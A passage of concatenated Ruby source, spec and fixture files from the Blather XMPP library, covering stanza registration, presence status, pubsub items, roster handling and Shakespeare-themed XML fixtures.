# A node payload is serialized on read; #payload always returns a String.
it 'makes payloads readable as string' do
payload = Blather::XMPPNode.new 'foo'
item = Blather::Stanza::PubSub::Items::PubSubItem.new 'bar', payload
expect(item.payload).to eq(payload.to_s)
end
end
<file_sep>/lib/blather/xmpp_node.rb
module Blather
# Base XML Node
# All XML classes subclass XMPPNode it allows the addition of helpers
class XMPPNode < Niceogiri::XML::Node
# Stanza names that must NOT carry an explicit namespace on creation
# @private
BASE_NAMES = %w[presence message iq].freeze
# Maps [name, namespace] pairs to the stanza class registered for them
# @private
@@registrations = {}
class_attribute :registered_ns, :registered_name
# Register a new stanza class to a name and/or namespace
#
# This registers a namespace that is used when looking
# up the class name of the object to instantiate when a new
# stanza is received
#
# @param [#to_s] name the name of the node
# @param [String, nil] ns the namespace the node belongs to
def self.register(name, ns = nil)
self.registered_name = name.to_s
self.registered_ns = ns
@@registrations[[self.registered_name, self.registered_ns]] = self
end
# Find the class to use given the name and namespace of a stanza
#
# @param [#to_s] name the name to lookup
# @param [String, nil] ns the namespace the node belongs to
# @return [Class, nil] the class appropriate for the name/ns combination
def self.class_from_registration(name, ns = nil)
reg = @@registrations[[name.to_s, ns]]
# Stanzas arriving under the default stream namespaces fall back to the
# namespace-less registration (e.g. bare <message/>, <presence/>, <iq/>)
return @@registrations[[name.to_s, nil]] if !reg && ["jabber:client", "jabber:component:accept"].include?(ns)
reg
end
# Import an XML::Node to the appropriate class
#
# Looks up the class the node should be then creates it based on the
# elements of the XML::Node
# @param [XML::Node] node the node to import
# @return the appropriate object based on the node name and namespace
def self.import(node, *decorators)
ns = (node.namespace.href if node.namespace)
klass = class_from_registration(node.element_name, ns)
# Delegate to the registered subclass unless the lookup landed back on
# this very class (which would recurse forever)
if klass && klass != self
klass.import(node, *decorators)
else
new(node.element_name).decorate(*decorators).inherit(node)
end
end
# Parse a string as XML and import to the appropriate class
#
# @param [String] string the string to parse
# @return the appropriate object based on the node name and namespace
def self.parse(string)
import Nokogiri::XML(string).root
end
# Create a new Node object
#
# @param [String, nil] name the element name
# @param [XML::Document, nil] doc the document to attach the node to. If
# not provided one will be created
# @return a new object with the registered name and namespace
def self.new(name = registered_name, doc = nil)
# Base stanza names get no namespace; everything else gets the class'
# registered namespace
super name, doc, BASE_NAMES.include?(name.to_s) ? nil : self.registered_ns
end
# Modules mixed into instances decorated with this class
#
# @return [Array<Module>]
def self.decorator_modules
if self.const_defined?(:InstanceMethods)
[self::InstanceMethods]
else
[]
end
end
# Extend this instance with each decorator's InstanceMethods and, when
# available, prepend the decorator's handler to the handler hierarchy
def decorate(*decorators)
decorators.each do |decorator|
decorator.decorator_modules.each do |mod|
extend mod
end
@handler_hierarchy.unshift decorator.handler_hierarchy.first if decorator.respond_to?(:handler_hierarchy)
end
self
end
# Look up child content by name; when the plain lookup fails and no
# explicit namespace was given, retry under the two default stream
# namespaces (client and component)
def content_from(name, ns = nil)
content = super
if !content && !ns
return super("ns:#{name}", ns: "jabber:client") || super("ns:#{name}", ns: "jabber:component:accept")
end
content
end
# Turn the object into a proper stanza
#
# @return a stanza object
def to_stanza
self.class.import self
end
end # XMPPNode
end # Blather
<file_sep>/lib/blather/stanza/disco.rb
module Blather
  class Stanza
    # # Disco Base class
    #
    # Shared behaviour for service-discovery queries. Use
    # Blather::Stanza::DiscoInfo or Blather::Stanza::DiscoItems directly.
    class Disco < Iq::Query
      # Fetch the node this disco query refers to
      #
      # @return [String] the node name
      def node
        query[:node]
      end

      # Assign the node this disco query refers to
      #
      # @param [#to_s] name the new node name
      def node=(name)
        query[:node] = name
      end

      # Equality check that also considers the node name in addition to
      # the fields compared by the parent class
      #
      # @param [Disco] other the object to compare against
      # @return [true, false]
      def eql?(other, *fields)
        super(other, *(fields << :node))
      end
    end
  end # Stanza
end # Blather
<file_sep>/lib/blather/stanza/presence/status.rb
module Blather
class Stanza
class Presence
# # Status Stanza
#
# [RFC 3921 Section 2.2.2 - Presence Child Elements](http://xmpp.org/rfcs/rfc3921.html#rfc.section.2.2.2)
#
# Presence stanzas are used to express an entity's current network
# availability (offline or online, along with various sub-states of the
# latter and optional user-defined descriptive text), and to notify other
# entities of that availability.
#
# ## "State" Attribute
#
# The `state` attribute determines the availability of the entity and can be
# one of the following:
#
# * `:available` -- The entity or resource is available
#
# * `:away` -- The entity or resource is temporarily away.
#
# * `:chat` -- The entity or resource is actively interested in chatting.
#
# * `:dnd` -- The entity or resource is busy (dnd = "Do Not Disturb").
#
# * `:xa` -- The entity or resource is away for an extended period (xa =
# "eXtended Away").
#
# Blather provides a helper for each possible state:
#
# Status#available?
# Status#away?
# Status#chat?
# Status#dnd?
# Status#xa?
#
# Blather treats the `type` attribute like a normal ruby object attribute
# providing a getter and setter. The default `type` is `available`.
#
# status = Status.new
# status.state # => :available
# status.available? # => true
# status.state = :away
# status.away? # => true
# status.available? # => false
# status
# status.state = :invalid # => RuntimeError
#
# ## "Type" Attribute
#
# The `type` attribute is inherited from Presence, but limits the value to
# either `nil` or `:unavailable` as these are the only types that relate to
# Status.
#
# ## "Priority" Attribute
#
# The `priority` attribute sets the priority of the status for the entity
# and must be an integer between -128 and 127.
#
# ## "Message" Attribute
#
# The optional `message` element contains XML character data specifying a
# natural-language description of availability status. It is normally used
# in conjunction with the show element to provide a detailed description of
# an availability state (e.g., "In a meeting").
#
# Blather treats the `message` attribute like a normal ruby object attribute
# providing a getter and setter. The default `message` is nil.
#
# status = Status.new
# status.message # => nil
# status.message = "gone!"
# status.message # => "gone!"
#
# @handler :status
class Status < Presence
# @private
# The spec requires only the following 4 states
VALID_STATES = [:away, :chat, :dnd, :xa].freeze
# The only presence type meaningful for Status (nil implies available)
VALID_TYPES = [:unavailable].freeze
# ...but this is the sorted list of possible states
POSSIBLE_STATES = [:unavailable, :dnd, :xa, :away, :available, :chat].freeze
include Comparable
register :status, :status
# Create a new Status stanza
#
# @param [<:away, :chat, :dnd, :xa>] state the state of the status
# @param [#to_s] message a message to send with the status
def self.new(state = nil, message = nil)
node = super()
node.state = state
node.message = message
node
end
module InstanceMethods
# Check if the state is available
#
# @return [true, false]
def available?
self.state == :available
end
# Check if the state is away
#
# @return [true, false]
def away?
self.state == :away
end
# Check if the state is chat
#
# @return [true, false]
def chat?
self.state == :chat
end
# Check if the state is dnd
#
# @return [true, false]
def dnd?
self.state == :dnd
end
# Check if the state is xa
#
# @return [true, false]
def xa?
self.state == :xa
end
# Set the state
# Ensure state is one of :available, :away, :chat, :dnd, :xa or nil
# Note :available is stored as nil (an empty <show/> means available)
#
# @param [<:available, :away, :chat, :dnd, :xa, nil>] state
# @raise [ArgumentError] if the state is not valid
def state=(state) # :nodoc:
state = state.to_sym if state
state = nil if state == :available
if state && !VALID_STATES.include?(state)
raise ArgumentError, "Invalid Status (#{state}), use: #{VALID_STATES*' '}"
end
set_content_for :show, state
end
# Get the state of the status
# Falls back on the presence type (e.g. :unavailable), then the <show/>
# content, then :available
#
# @return [<:available, :away, :chat, :dnd, :xa>]
def state
state = type || content_from(:show)
state = :available if state.blank?
state.to_sym
end
# Set the priority of the status
# Ensures priority is between -128 and 127
#
# @param [Fixnum<-128...127>] new_priority
# @raise [ArgumentError] if the priority is out of range
def priority=(new_priority) # :nodoc:
if new_priority && !(-128..127).include?(new_priority.to_i)
raise ArgumentError, 'Priority must be between -128 and +127'
end
set_content_for :priority, new_priority
end
# Get the priority of the status
# A missing <priority/> element reads as 0 (nil.to_i)
#
# @return [Fixnum<-128...127>]
def priority
read_content(:priority).to_i
end
# Get the status message
#
# @return [String, nil]
def message
read_content :status
end
# Set the status message
#
# @param [String, nil] message
def message=(message)
set_content_for :status, message
end
# Compare status based on priority and state:
# unavailable status is always less valuable than others
# Raises an error if the JIDs aren't the same
#
# @param [Blather::Stanza::Presence::Status] o
# @raise [ArgumentError] when comparing statuses from different JIDs
# @return [true,false]
def <=>(o)
if self.from || o.from
unless self.from.stripped == o.from.stripped
raise ArgumentError, "Cannot compare status from different JIDs: #{[self.from, o.from].inspect}"
end
end
# Same availability class (both available or both unavailable):
# compare by priority, breaking ties on the POSSIBLE_STATES ordering
if (self.type.nil? && o.type.nil?) || (!self.type.nil? && !o.type.nil?)
if self.priority == o.priority
POSSIBLE_STATES.index(self.state) <=> POSSIBLE_STATES.index(o.state)
else
self.priority <=> o.priority
end
elsif self.type.nil? && !o.type.nil?
1
elsif !self.type.nil? && o.type.nil?
-1
end
end
end
include InstanceMethods
end #Status
end #Presence
end #Stanza
end #Blather
<file_sep>/lib/blather/stream/client.rb
module Blather
class Stream
# @private
class Client < Stream
# Stream header defaults for a standard client ("c2s") connection
LANG = 'en'
VERSION = '1.0'
NAMESPACE = 'jabber:client'
# Open the XML stream by sending the initial <stream:stream> header
def start
@parser = Parser.new self
send "<stream:stream to='#{@to}' xmlns='#{NAMESPACE}' xmlns:stream='#{STREAM_NS}' version='#{VERSION}' xml:lang='#{LANG}'>"
end
# Write a stanza to the wire, rewriting any pre-set "from" with this
# stream's bound JID.
# NOTE(review): the guard `!stanza.from.nil?` means a stanza WITHOUT a
# "from" goes out unstamped (presumably the server stamps it), while one
# WITH a "from" is overwritten with the authoritative JID — confirm this
# asymmetry is intended and not a negation slip (`stanza.from.nil?`).
def send(stanza)
stanza.from = self.jid if stanza.is_a?(Stanza) && !stanza.from.nil?
super stanza
end
# Finish the parser before the parent tears down the connection
def cleanup
@parser.finish if @parser
super
end
end #Client
end #Stream
end #Blather
<file_sep>/lib/blather/stanza/pubsub.rb
module Blather
class Stanza
# # Pubsub Stanza
#
# [XEP-0060 - Publish-Subscribe](http://xmpp.org/extensions/xep-0060.html)
#
# The base class for all PubSub nodes. This provides helper methods common to
# all PubSub nodes.
#
# @handler :pubsub_node
class PubSub < Iq
register :pubsub_node, :pubsub, 'http://jabber.org/protocol/pubsub'
# Dispatch to the concrete PubSub subclass: the first child of the
# <pubsub/> node whose (name, namespace) pair has a registration decides
# the class; #detect stops at the first match because the block returns
# the assigned klass.
# @private
def self.import(node)
klass = nil
if pubsub = node.document.find_first('//ns:pubsub', :ns => self.registered_ns)
pubsub.children.detect do |e|
ns = e.namespace ? e.namespace.href : nil
klass = class_from_registration(e.element_name, ns)
end
end
(klass || self).new(node[:type]).inherit(node)
end
# Overwrites the parent constructor to ensure a pubsub node is present.
# Also allows the addition of a host attribute
#
# @param [<Blather::Stanza::Iq::VALID_TYPES>] type the IQ type
# @param [String, nil] host the host the node should be sent to
def self.new(type = nil, host = nil)
new_node = super type
new_node.to = host
new_node.pubsub
new_node
end
# Overrides the parent to ensure the current pubsub node is destroyed before
# inheritting the new content
#
# @private
def inherit(node)
remove_children :pubsub
super
end
# Get or create the pubsub node on the stanza
# Looks up the child both with and without a namespace prefix before
# creating a fresh <pubsub/> element
#
# @return [Blather::XMPPNode]
def pubsub
p = find_first('ns:pubsub', :ns => self.class.registered_ns) ||
find_first('pubsub', :ns => self.class.registered_ns)
unless p
self << (p = XMPPNode.new('pubsub', self.document))
p.namespace = self.class.registered_ns
end
p
end
end # PubSub
# # PubSubItem Fragment
#
# This fragment appears in many places throughout the pubsub spec.
# It is a convenience class for attaching helper methods to an <item/> node.
class PubSubItem < XMPPNode
  # Create a new PubSubItem
  #
  # @param [String, nil] id the id of the stanza
  # @param [#to_s, nil] payload the payload to attach to this item.
  # @param [XML::Document, nil] document the document the node should be
  #   attached to. This should be the document of the parent PubSub node.
  def self.new(id = nil, payload = nil, document = nil)
    # Passing an existing PubSubItem through is a no-op
    return id if id.class == self
    item = super 'item', document
    item.id = id
    item.payload = payload if payload
    item
  end

  # The item's ID
  #
  # @return [String, nil]
  def id
    read_attr :id
  end

  # Set the item's ID
  #
  # @param [#to_s] id the new ID
  def id=(id)
    write_attr :id, id
  end

  alias_method :payload_node, :child

  # The item's payload, serialized as a string
  #
  # @return [String, nil]
  def payload
    return nil if children.empty?
    children.to_s
  end

  # Replace the item's payload, clearing any existing children first
  #
  # @param [String, XMPPNode, nil] payload the new payload
  def payload=(payload)
    children.each(&:remove)
    return unless payload
    if payload.is_a?(String)
      self.content = payload
    else
      self << payload
    end
  end
end # PubSubItem
end # Stanza
end # Blather
<file_sep>/lib/blather/stanza/iq/ping.rb
module Blather
  class Stanza
    class Iq
      # # Ping Stanza
      #
      # [XEP-0199: XMPP Ping](http://xmpp.org/extensions/xep-0199.html)
      #
      # Base class for XMPP Ping IQ stanzas.
      #
      # @handler :ping
      class Ping < Iq
        # @private
        register :ping, :ping, 'urn:xmpp:ping'

        # Create a new Ping stanza, guaranteeing a <ping/> child is present
        #
        # @see Blather::Stanza::Iq.new
        def self.new(type = :get, to = nil, id = nil)
          stanza = super
          stanza.ping
          stanza
        end

        # Drop our <ping/> child before inheriting the other node's content
        #
        # @see Blather::Stanza::Iq#inherit
        def inherit(node)
          ping.remove
          super
        end

        # The <ping/> child node, created on demand when absent
        #
        # @return [Blather::XMPPNode]
        def ping
          node = find_first('ns:ping', :ns => self.class.registered_ns)
          return node if node
          node = XMPPNode.new('ping', self.document)
          self << node
          node.namespace = self.class.registered_ns
          node
        end
      end
    end
  end
end
<file_sep>/spec/blather/stanza/iq_spec.rb
require 'spec_helper'
describe Blather::Stanza::Iq do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:iq, nil)).to eq(Blather::Stanza::Iq)
end
it 'must be importable' do
string = "<iq from='<EMAIL>/balcony' type='set' id='roster_4'></iq>"
expect(Blather::XMPPNode.parse(string)).to be_instance_of Blather::Stanza::Iq
end
it 'creates a new Iq stanza defaulted as a get' do
expect(Blather::Stanza::Iq.new.type).to eq(:get)
end
it 'sets the id when created' do
expect(Blather::Stanza::Iq.new.id).not_to be_nil
end
it 'creates a new Stanza::Iq object on import' do
expect(Blather::Stanza::Iq.import(Blather::XMPPNode.new('iq'))).to be_kind_of Blather::Stanza::Iq
end
# A <query/> child causes import to dispatch to the Query subclass.
it 'creates a proper object based on its children' do
n = Blather::XMPPNode.new('iq')
n << Blather::XMPPNode.new('query', n.document)
expect(Blather::Stanza::Iq.import(n)).to be_kind_of Blather::Stanza::Iq::Query
end
it 'ensures type is one of Stanza::Iq::VALID_TYPES' do
expect { Blather::Stanza::Iq.new :invalid_type_name }.to raise_error(Blather::ArgumentError)
Blather::Stanza::Iq::VALID_TYPES.each do |valid_type|
n = Blather::Stanza::Iq.new valid_type
expect(n.type).to eq(valid_type)
end
end
Blather::Stanza::Iq::VALID_TYPES.each do |valid_type|
it "provides a helper (#{valid_type}?) for type #{valid_type}" do
expect(Blather::Stanza::Iq.new).to respond_to :"#{valid_type}?"
end
end
# Replies strip the payload by default...
it 'removes the body when replying' do
iq = Blather::Stanza::Iq.new :get, '<EMAIL>'
iq.from = '<EMAIL>'
iq << Blather::XMPPNode.new('query', iq.document)
r = iq.reply
expect(r.children.empty?).to eq(true)
end
# ...unless :remove_children => false is passed explicitly.
it 'does not remove the body when replying if we ask to keep it' do
iq = Blather::Stanza::Iq.new :get, '<EMAIL>'
iq.from = '<EMAIL>'
iq << Blather::XMPPNode.new('query', iq.document)
r = iq.reply :remove_children => false
expect(r.children.empty?).to eq(false)
end
end
<file_sep>/spec/blather/stanza/presence/subscription_spec.rb
require 'spec_helper'
describe Blather::Stanza::Presence::Subscription do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:subscription, nil)).to eq(Blather::Stanza::Presence::Subscription)
end
[:subscribe, :subscribed, :unsubscribe, :unsubscribed].each do |type|
it "must be importable as #{type}" do
expect(Blather::XMPPNode.parse("<presence type='#{type}'/>")).to be_kind_of Blather::Stanza::Presence::Subscription::InstanceMethods
end
end
it 'can set to on creation' do
sub = Blather::Stanza::Presence::Subscription.new 'a@b'
expect(sub.to.to_s).to eq('a@b')
end
it 'can set a type on creation' do
sub = Blather::Stanza::Presence::Subscription.new nil, :subscribed
expect(sub.type).to eq(:subscribed)
end
it 'strips Blather::JIDs when setting #to' do
sub = Blather::Stanza::Presence::Subscription.new 'a@b/c'
expect(sub.to.to_s).to eq('a@b')
end
it 'generates an approval using #approve!' do
sub = Blather::Stanza.import Nokogiri::XML('<presence from="a@b" type="subscribe"><status/></presence>').root
sub.approve!
expect(sub.to).to eq('a@b')
expect(sub.type).to eq(:subscribed)
end
it 'generates a refusal using #refuse!' do
jid = Blather::JID.new 'a@b'
sub = Blather::Stanza::Presence::Subscription.new
sub.from = jid
sub.refuse!
expect(sub.to).to eq(jid)
expect(sub.type).to eq(:unsubscribed)
end
it 'generates an unsubscript using #unsubscribe!' do
jid = Blather::JID.new 'a@b'
sub = Blather::Stanza::Presence::Subscription.new
sub.from = jid
sub.unsubscribe!
expect(sub.to).to eq(jid)
expect(sub.type).to eq(:unsubscribe)
end
it 'generates a cancellation using #cancel!' do
jid = Blather::JID.new 'a@b'
sub = Blather::Stanza::Presence::Subscription.new
sub.from = jid
sub.cancel!
expect(sub.to).to eq(jid)
expect(sub.type).to eq(:unsubscribed)
end
it 'generates a request using #request!' do
jid = Blather::JID.new 'a@b'
sub = Blather::Stanza::Presence::Subscription.new
sub.from = jid
sub.request!
expect(sub.to).to eq(jid)
expect(sub.type).to eq(:subscribe)
end
it 'has a #request? helper' do
sub = Blather::Stanza::Presence::Subscription.new
expect(sub).to respond_to :request?
sub.type = :subscribe
expect(sub.request?).to eq(true)
end
it "successfully routes chained actions" do
from = Blather::JID.new("<EMAIL>")
to = Blather::JID.new("<EMAIL>")
sub = Blather::Stanza::Presence::Subscription.new
sub.from = from
sub.to = to
sub.cancel!
sub.unsubscribe!
expect(sub.type).to eq(:unsubscribe)
expect(sub.to).to eq(from)
expect(sub.from).to eq(to)
end
it "will inherit only another node's attributes" do
inheritable = Blather::XMPPNode.new 'foo'
inheritable[:bar] = 'baz'
sub = Blather::Stanza::Presence::Subscription.new
expect(sub).to respond_to :inherit
sub.inherit inheritable
expect(sub[:bar]).to eq('baz')
end
end
<file_sep>/lib/blather/roster.rb
module Blather
# Local Roster
# Takes care of adding/removing JIDs through the stream
class Roster
include Enumerable
# The roster version reported by the last processed roster stanza
attr_reader :version
# Create a new roster
#
# @param [Blather::Stream] stream the stream the roster should use to
# update roster entries
# @param [Blather::Stanza::Iq::Roster] stanza a roster stanza used to preload
# the roster
# @return [Blather::Roster]
def initialize(stream, stanza = nil)
@stream = stream
@items = {}
process(stanza) if stanza
end
# Process any incoming stanzas and either adds or removes the
# corresponding RosterItem
# Items with subscription :remove are deleted; all others are
# added/overwritten keyed by their stripped JID
#
# @param [Blather::Stanza::Iq::Roster] stanza a roster stanza
def process(stanza)
@version = stanza.version
stanza.items.each do |i|
case i.subscription
when :remove then @items.delete(key(i.jid))
else @items[key(i.jid)] = RosterItem.new(i)
end
end
end
# Pushes a JID into the roster
#
# @param [String, Blather::JID, #jid] elem a JID to add to the roster
# @return [self]
# @see #push
def <<(elem)
push elem
self
end
# Push a JID into the roster and update the server
#
# @param [String, Blather::JID, #jid] elem a jid to add to the roster
# @param [true, false] send send the update over the wire
# @see Blather::JID
def push(elem, send = true)
jid = elem.respond_to?(:jid) && elem.jid ? elem.jid : JID.new(elem)
@items[key(jid)] = node = RosterItem.new(elem)
@stream.write(node.to_stanza(:set)) if send
end
alias_method :add, :push
# Remove a JID from the roster and update the server
# Always notifies the server (no local-only variant)
#
# @param [String, Blather::JID] jid the JID to remove from the roster
def delete(jid)
@items.delete key(jid)
item = Stanza::Iq::Roster::RosterItem.new(jid, nil, :remove)
@stream.write Stanza::Iq::Roster.new(:set, item)
end
alias_method :remove, :delete
# Get a RosterItem by JID
#
# @param [String, Blather::JID] jid the jid of the item to return
# @return [Blather::RosterItem, nil] the associated RosterItem
def [](jid)
items[key(jid)]
end
# Iterate over all RosterItems
#
# @yield [Blather::RosterItem] yields each RosterItem
def each(&block)
items.values.each &block
end
# Get a duplicate of all RosterItems
# Note: only the Hash is duplicated; the RosterItem objects are shared
#
# @return [Array<Blather::RosterItem>] a duplicate of all RosterItems
def items
@items.dup
end
# Number of items in the roster
#
# @return [Integer] the number of items in the roster
def length
@items.length
end
# A hash of items keyed by group
#
# @return [Hash<group => Array<RosterItem>>]
def grouped
@items.values.sort.inject(Hash.new{|h,k|h[k]=[]}) do |hash, item|
item.groups.each { |group| hash[group] << item }
hash
end
end
private
# Creates a stripped jid
# NOTE(review): `private` has no effect on `def self.key` — class methods
# require private_class_method; Roster.key is currently callable from
# outside. Confirm whether that visibility is relied upon before changing.
def self.key(jid)
JID.new(jid).stripped.to_s
end
# Instance method to wrap around the class method
def key(jid)
self.class.key(jid)
end
end # Roster
end # Blather
<file_sep>/spec/fixtures/pubsub.rb
# Fixture: a complete pubsub items result (XEP-0060) containing four
# Atom-payload items for the 'princely_musings' node.
def items_all_nodes_xml
<<-ITEMS
<iq type='result'
from='pubsub.shakespeare.lit'
to='francisco@denmark.lit/barracks'
id='items1'>
<pubsub xmlns='http://jabber.org/protocol/pubsub'>
<items node='princely_musings'>
<item id='368866411b877c30064a5f62b917cffe'>
<entry xmlns='http://www.w3.org/2005/Atom'>
<title>The Uses of This World</title>
<summary>
O, that this too too solid flesh would melt
Thaw and resolve itself into a dew!
</summary>
<link rel='alternate' type='text/html'
href='http://denmark.lit/2003/12/13/atom03'/>
<id>tag:denmark.lit,2003:entry-32396</id>
<published>2003-12-12T17:47:23Z</published>
<updated>2003-12-12T17:47:23Z</updated>
</entry>
</item>
<item id='3300659945416e274474e469a1f0154c'>
<entry xmlns='http://www.w3.org/2005/Atom'>
<title>Ghostly Encounters</title>
<summary>
O all you host of heaven! O earth! what else?
And shall I couple hell? O, fie! Hold, hold, my heart;
And you, my sinews, grow not instant old,
But bear me stiffly up. Remember thee!
</summary>
<link rel='alternate' type='text/html'
href='http://denmark.lit/2003/12/13/atom03'/>
<id>tag:denmark.lit,2003:entry-32396</id>
<published>2003-12-12T23:21:34Z</published>
<updated>2003-12-12T23:21:34Z</updated>
</entry>
</item>
<item id='4e30f35051b7b8b42abe083742187228'>
<entry xmlns='http://www.w3.org/2005/Atom'>
<title>Alone</title>
<summary>
Now I am alone.
O, what a rogue and peasant slave am I!
</summary>
<link rel='alternate' type='text/html'
href='http://denmark.lit/2003/12/13/atom03'/>
<id>tag:denmark.lit,2003:entry-32396</id>
<published>2003-12-13T11:09:53Z</published>
<updated>2003-12-13T11:09:53Z</updated>
</entry>
</item>
<item id='ae890ac52d0df67ed7cfdf51b644e901'>
<entry xmlns='http://www.w3.org/2005/Atom'>
<title>Soliloquy</title>
<summary>
To be, or not to be: that is the question:
Whether 'tis nobler in the mind to suffer
The slings and arrows of outrageous fortune,
Or to take arms against a sea of troubles,
And by opposing end them?
</summary>
<link rel='alternate' type='text/html'
href='http://denmark.lit/2003/12/13/atom03'/>
<id>tag:denmark.lit,2003:entry-32397</id>
<published>2003-12-13T18:30:02Z</published>
<updated>2003-12-13T18:30:02Z</updated>
</entry>
</item>
</items>
</pubsub>
</iq>
ITEMS
end
# Fixture: a XEP-0060 "retrieve items" result IQ that returns only part of
# the node's items (3 of 19) together with a XEP-0059 RSM <set/> element
# (first/last/count) describing the page.
def pubsub_items_some_xml
<<-ITEMS
<iq type='result'
from='pubsub.shakespeare.lit'
to='<EMAIL>.lit/barracks'
id='items1'>
<pubsub xmlns='http://jabber.org/protocol/pubsub'>
<items node='princely_musings'>
<item id='368866411b877c30064a5f62b917cffe'>
<entry xmlns='http://www.w3.org/2005/Atom'>
<title>The Uses of This World</title>
<summary>
O, that this too too solid flesh would melt
Thaw and resolve itself into a dew!
</summary>
<link rel='alternate' type='text/html'
href='http://denmark.lit/2003/12/13/atom03'/>
<id>tag:denmark.lit,2003:entry-32396</id>
<published>2003-12-12T17:47:23Z</published>
<updated>2003-12-12T17:47:23Z</updated>
</entry>
</item>
<item id='3300659945416e274474e469a1f0154c'>
<entry xmlns='http://www.w3.org/2005/Atom'>
<title>Ghostly Encounters</title>
<summary>
O all you host of heaven! O earth! what else?
And shall I couple hell? O, fie! Hold, hold, my heart;
And you, my sinews, grow not instant old,
But bear me stiffly up. Remember thee!
</summary>
<link rel='alternate' type='text/html'
href='http://denmark.lit/2003/12/13/atom03'/>
<id>tag:denmark.lit,2003:entry-32396</id>
<published>2003-12-12T23:21:34Z</published>
<updated>2003-12-12T23:21:34Z</updated>
</entry>
</item>
<item id='4e30f35051b7b8b42abe083742187228'>
<entry xmlns='http://www.w3.org/2005/Atom'>
<title>Alone</title>
<summary>
Now I am alone.
O, what a rogue and peasant slave am I!
</summary>
<link rel='alternate' type='text/html'
href='http://denmark.lit/2003/12/13/atom03'/>
<id>tag:denmark.lit,2003:entry-32396</id>
<published>2003-12-13T11:09:53Z</published>
<updated>2003-12-13T11:09:53Z</updated>
</entry>
</item>
</items>
<set xmlns='http://jabber.org/protocol/rsm'>
<first index='0'>368866411b877c30064a5f62b917cffe</first>
<last>4e30f35051b7b8b42abe083742187228</last>
<count>19</count>
</set>
</pubsub>
</iq>
ITEMS
end
# Fixture: a XEP-0060 "retrieve affiliations" result IQ listing six nodes,
# covering the owner/publisher/outcast/member/none affiliation values.
def affiliations_xml
<<-NODE
<iq type='result'
from='pubsub.shakespeare.lit'
to='<EMAIL>'
id='affil1'>
<pubsub xmlns='http://jabber.org/protocol/pubsub'>
<affiliations>
<affiliation node='node1' affiliation='owner'/>
<affiliation node='node2' affiliation='owner'/>
<affiliation node='node3' affiliation='publisher'/>
<affiliation node='node4' affiliation='outcast'/>
<affiliation node='node5' affiliation='member'/>
<affiliation node='node6' affiliation='none'/>
</affiliations>
</pubsub>
</iq>
NODE
end
# Fixture: a XEP-0060 "retrieve subscriptions" result IQ with five entries
# in the subscribed/unconfigured/pending/none states; two carry a subid.
def subscriptions_xml
<<-NODE
<iq type='result'
from='pubsub.shakespeare.lit'
to='<EMAIL>'
id='affil1'>
<pubsub xmlns='http://jabber.org/protocol/pubsub'>
<subscriptions>
<subscription node='node1' jid='<EMAIL>' subscription='subscribed' subid='fd8237yr872h3f289j2'/>
<subscription node='node2' jid='<EMAIL>' subscription='subscribed' subid='h8394hf8923ju'/>
<subscription node='node3' jid='<EMAIL>' subscription='unconfigured'/>
<subscription node='node4' jid='<EMAIL>' subscription='pending'/>
<subscription node='node5' jid='<EMAIL>' subscription='none'/>
</subscriptions>
</pubsub>
</iq>
NODE
end
# Fixture: a pubsub#event notification message whose item carries a full
# Atom entry payload (title, summary, link, timestamps).
def event_with_payload_xml
<<-NODE
<message from='pubsub.shakespeare.lit' to='<EMAIL>' id='foo'>
<event xmlns='http://jabber.org/protocol/pubsub#event'>
<items node='princely_musings'>
<item id='ae890ac52d0df67ed7cfdf51b644e901'>
<entry xmlns='http://www.w3.org/2005/Atom'>
<title>Soliloquy</title>
<summary>
To be, or not to be: that is the question:
Whether 'tis nobler in the mind to suffer
The slings and arrows of outrageous fortune,
Or to take arms against a sea of troubles,
And by opposing end them?
</summary>
<link rel='alternate' type='text/html'
href='http://denmark.lit/2003/12/13/atom03'/>
<id>tag:denmark.lit,2003:entry-32397</id>
<published>2003-12-13T18:30:02Z</published>
<updated>2003-12-13T18:30:02Z</updated>
</entry>
</item>
</items>
</event>
</message>
NODE
end
# Fixture: a payload-free pubsub#event notification — the item element
# carries only its id, no Atom entry.
def event_notification_xml
<<-NODE
<message from='pubsub.shakespeare.lit' to='<EMAIL>' id='foo'>
<event xmlns='http://jabber.org/protocol/pubsub#event'>
<items node='princely_musings'>
<item id='ae890ac52d0df67ed7cfdf51b644e901'/>
</items>
</event>
</message>
NODE
end
# Fixture: a payload-free pubsub#event notification that also includes a
# SHIM <headers/> block carrying two SubID header values.
def event_subids_xml
<<-NODE
<message from='pubsub.shakespeare.lit' to='<EMAIL>' id='foo'>
<event xmlns='http://jabber.org/protocol/pubsub#event'>
<items node='princely_musings'>
<item id='ae890ac52d0df67ed7cfdf51b644e901'/>
</items>
</event>
<headers xmlns='http://jabber.org/protocol/shim'>
<header name='SubID'>123-abc</header>
<header name='SubID'>004-yyy</header>
</headers>
</message>
NODE
end
# Fixture: an error IQ rejecting an unsubscribe request — a modify-type
# bad-request error with the pubsub#errors subid-required condition.
def unsubscribe_xml
<<-NODE
<iq type='error'
from='pubsub.shakespeare.lit'
to='<EMAIL>/barracks'
id='unsub1'>
<pubsub xmlns='http://jabber.org/protocol/pubsub'>
<unsubscribe node='princely_musings' jid='<EMAIL>'/>
</pubsub>
<error type='modify'>
<bad-request xmlns='urn:ietf:params:xml:ns:xmpp-stanzas'/>
<subid-required xmlns='http://jabber.org/protocol/pubsub#errors'/>
</error>
</iq>
NODE
end
# Fixture: a successful subscription result IQ — the <subscription/>
# element reports state 'subscribed' along with the assigned subid.
def subscription_xml
<<-NODE
<iq type='result'
from='pubsub.shakespeare.lit'
to='francisco@den<EMAIL>.lit/barracks'
id='sub1'>
<pubsub xmlns='http://jabber.org/protocol/pubsub'>
<subscription
node='princely_musings'
jid='<EMAIL>'
subid='ba49252aaa4f5d320c24d3766f0bdcade78c78d3'
subscription='subscribed'/>
</pubsub>
</iq>
NODE
end
# Fixture: an outgoing set IQ asking the pubsub service to subscribe the
# given JID to the 'princely_musings' node.
def subscribe_xml
<<-NODE
<iq type='set'
from='<EMAIL>.lit/barracks'
to='pubsub.shakespeare.lit'
id='sub1'>
<pubsub xmlns='http://jabber.org/protocol/pubsub'>
<subscribe
node='princely_musings'
jid='<EMAIL>'/>
</pubsub>
</iq>
NODE
end
# Fixture: a result IQ acknowledging a publish — echoes the node name and
# the id assigned to the published item.
def publish_xml
<<-NODE
<iq type='result'
from='pubsub.shakespeare.lit'
to='hamlet@denmark.lit/blogbot'
id='publish1'>
<pubsub xmlns='http://jabber.org/protocol/pubsub'>
<publish node='princely_musings'>
<item id='ae890ac52d0df67ed7cfdf51b644e901'/>
</publish>
</pubsub>
</iq>
NODE
end
